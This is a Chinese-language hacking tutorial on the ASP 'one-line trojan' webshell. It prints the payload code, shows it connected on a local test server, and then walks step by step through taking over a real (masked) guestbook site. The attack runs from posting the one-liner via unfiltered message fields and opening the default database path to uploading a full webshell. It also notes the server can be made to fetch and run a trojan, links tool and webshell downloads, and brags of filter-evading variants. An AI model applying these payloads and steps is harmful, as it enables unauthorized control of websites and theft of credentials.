一句話可以干什么?你可能會說微不足道,也可能會說對人的一生產(chǎn)生久遠的影響。那么,一句話對一個網(wǎng)站來說意味著什么?我說,可能是一場飛來橫禍,你信嗎?下面聽我一一道來。
我們今天要談到的一句話,是一句簡短的asp代碼,這段代碼要是存在于服務器上的網(wǎng)站目錄內(nèi)的任意一個asp動態(tài)網(wǎng)頁文件內(nèi),那么這個網(wǎng)站就將成為黑客的囊中之物了。通過連接這一句話,黑客就可以對網(wǎng)站執(zhí)行任意操作,比如上傳、下載、執(zhí)行CMD命令。獲取管理員密碼、修改注冊表等等。
大家都用過木馬的吧?要先生成一個客戶端,然后把那個生成好的exe文件發(fā)給別人。當它運行之后。在你的控制端里面就會顯示有主機上線了。我們今天講的原理和這個有點像,不過我們要控制的是一個網(wǎng)站,而不是PC機。一句話的寫法主流是兩種,一種是<%execute request(“value”)%>,還有一種是<%evalrequest(“value“)%>。前一種的功能比較有限,我今天講解后一種一句話的使用。
本地實習
上面我們說了,只要服務器上的任意一個asp網(wǎng)頁文件內(nèi)容里包含這一句話。在本地我只要打開一句話木馬客戶端連接上去,就能控制這個網(wǎng)站了。用到的連接工具是——Lake2的一句話客戶端漢化版,這個漢化版,是我自己翻譯的哦,網(wǎng)上下載不到。
第一步:搭建asp服務器
說到服務器的搭建,可能很多小菜看到這兒就開始打退堂鼓了,其實很簡單,用到一個叫“紫雨軒ASP Web服務器”的軟件。下載軟件,運行,可以看到的界面。我們要先選擇ASP服務運行的路徑,點擊界面上的“參數(shù)設(shè)置”按鈕,出現(xiàn)參數(shù)設(shè)置的界面,我點擊“根目錄”右邊的“..”按鈕。選中了桌面上的“www”文件夾作為網(wǎng)站根目錄。再點“保存”回到程序主界面。點擊最左邊的那個“啟動服務”按鈕,OK。第二步:寫入一句話ASP服務器搭建好了,我打開桌面上的“www”文件夾。新建一個txt文件。用記事本打開,寫入一句話的內(nèi)容<%evalrequest(“123”)%>,保存,再將名字改為bwl.asp。
第三步:連接一句話
含有一句話的asp文件準備好了,我們打開Lake2的一句話客戶端漢化版。這是一個htm網(wǎng)頁文件。由于我們本地搭建好了ASP服務器了。在“ASP地址”后面就填入“http://localhost/bwl.asp”,“登錄密碼”后面寫“123”。“功能”后面是一個下拉列表,里面有很多功能。
第四步:測試功能
選擇下拉列表里的“本地磁盤”,然后點“發(fā)送”按鈕。服務器(也就是我這臺電腦)的磁盤信息出來了,同樣的,選擇“文件列表”。點“發(fā)送”按鈕,就能夠查看服務器上的所有文件了。其他的功能我就不贅述了,大家自己摸索??梢陨蟼鳌⑾螺d文件,讓服務器從某個指定的URL上下載木馬并運行,刪除、復制文件等等。
實戰(zhàn)前的講解
那我們現(xiàn)在就要把眼光放開了,要把這個用來對付真正的網(wǎng)站了。在這一部分,我來講解下如何利用一句話,它的插入方法和插入地址的確定。我們作為訪客,而不是網(wǎng)站管理員,唯一能操作的文件就是數(shù)據(jù)庫。為什么這么說呢?我們在論壇里注冊用戶、發(fā)帖子,這些數(shù)據(jù)都會被網(wǎng)頁程序提交到網(wǎng)站的后臺數(shù)據(jù)庫中進行存儲,如果我們在帖子里寫入一句話后提交?;蚴窃谧杂脩舻臅r候,在注冊資料里寫入一句話,那么一句話也會被送到數(shù)據(jù)庫里。我們沒有能力在網(wǎng)站的“表面”上編輯其他的asp文件,只有權(quán)對數(shù)據(jù)庫進行更新。
一句話提交進了數(shù)據(jù)庫文件,那么下面要做的一件事情就是找出數(shù)據(jù)庫的地址,這樣。我們的一句話客戶端才能找到一句話并成功連接。
一般的,通過一句話入侵網(wǎng)站,有我講述的如下幾個入侵思路:
①通過發(fā)帖、留言、注冊等方法寫入一句話,然后通過暴庫漏洞,找出網(wǎng)站的數(shù)據(jù)庫所在地址。
②寫入一句話后,根據(jù)網(wǎng)站程序的默認數(shù)據(jù)庫來進行連接。
③首先上傳一個txt文件,里面寫入一句話的代碼,想辦法得到論壇管理員密碼,進入后臺。通過文件管理。把txt后綴改為asp。與這種方法搭配的常用手段為注入,我在二月刊上有過講解指定網(wǎng)站的注入方法。
遠程入侵
第一步:我這次選擇的對象是www.xxxxx.com/bbs/index.asp。我們要做兩件事情,一件是插入一句話。一件是獲得數(shù)據(jù)庫地址。獲得數(shù)據(jù)庫地址很關(guān)鍵,不然我們無法知道一句話插到哪個ASP文件里面去了。
第二步:首先我嘗試了暴庫,沒有成功搞出數(shù)據(jù)庫路徑。我向下看,發(fā)現(xiàn)網(wǎng)頁的最底下有一些信息:design by★寒冰★QQ:51632561 designlife online AllRights Reserved。處于職業(yè)習慣,百度了一下這些信息,發(fā)現(xiàn)這套系統(tǒng)的名字是“設(shè)計人生(designlife V1.5)留言系統(tǒng)”,這套留言系統(tǒng)的默認數(shù)據(jù)庫地址是網(wǎng)站根目錄下的data文件夾里的#1ifedata.asp。好,試試看,在瀏覽器里提交WWW.XXXXX.com/bbs/data/%231ifedata.asp,數(shù)據(jù)庫被打開了。
第三步:看來網(wǎng)站管理員很懶,連默認數(shù)據(jù)庫的地址都沒有改,我們下面來寫入一句話。這個留言本對留言過濾不嚴格,所以造成我們的一句話可以成功寫入。點擊首頁上的“我要留言”按鈕。進入了留言簽寫地址WWW.XXXX.com/bbs/add.asp。在主題和內(nèi)容上都寫入一句話,然后點“提交”發(fā)表留言?,F(xiàn)在好了,我們的一句話進數(shù)據(jù)庫了,密碼是bwl。
第四步:打開Lake2的一句話客戶端漢化版,在“ASP地址”后面填“http://www.xxxx.com/bbs/data/%231ifedata.asp”,“登錄密碼”后面寫“bwl”。下面就像我一開始講的本地操作一樣了,這個網(wǎng)站已經(jīng)被你控制了。如果你覺得這樣控制太麻煩,你也可以以此為跳板。上傳功能強大的Webshell文件,下面我來講下操作。
第五步:選中“功能”右邊列表中的“本地磁盤”,點發(fā)送,來查看網(wǎng)站的物理路徑,根據(jù)偵測。我發(fā)現(xiàn)網(wǎng)站位于服務器的F:\\wwwroot文件夾里。大家自己看具體情況而定。然后選中“功能”右邊列表中的“上傳文本”,下面會出現(xiàn)文本上傳窗口,填入相對應的數(shù)據(jù)。我把一個Webshell文件用記事本打開,把里面的代碼全部復制到客戶端的文本框里。我這里用的Webshell代碼會提供給大家下載。點擊“發(fā)送”按鈕,客戶端會提示文本文件上傳成功了。那么http://www.xxxx.com/bbs/test.asp就是Webshell的地址了。
一句話是不是很可怕呢?除非是超主流的網(wǎng)站系統(tǒng),一般網(wǎng)站都會存在一句話的插入危險,一句話可謂是無孔不入啊。學會了一句話的運用,你就可以算是一個準小黑了。其實一句話的變形加密寫法其實還有很多。加密后的一句話可以躲過網(wǎng)站系統(tǒng)的過濾且不影響連接,據(jù)我所知。就有一種一句話的變形形式99%的網(wǎng)站系統(tǒng)都無法過濾,百插不爽噢。大家可以在網(wǎng)友世界論壇留言,如果很多人想學的話,我就寫一篇一句話的高級應用及各種變形奉獻給你們。
本文用到的所有相關(guān)軟件下載地址,Lake2一句話客戶端在線版http://user.free2.77169.net/biweilun/,下載地址:http://user.free2.77169.Ret/biweilun/lake2hanhua.rar。紫雨軒ASP服務器偉倫優(yōu)化版(去除界面上那個難看的丑女圖片,修正了訪問Bug)。下載地址:http://user.free2.77169.net/biweilun/BWLASPSEVER.exe。大Webshell V1P 9.0漫步云端版,下載地址:http://user.free2.77169.net/biweilun/WebShell.rar。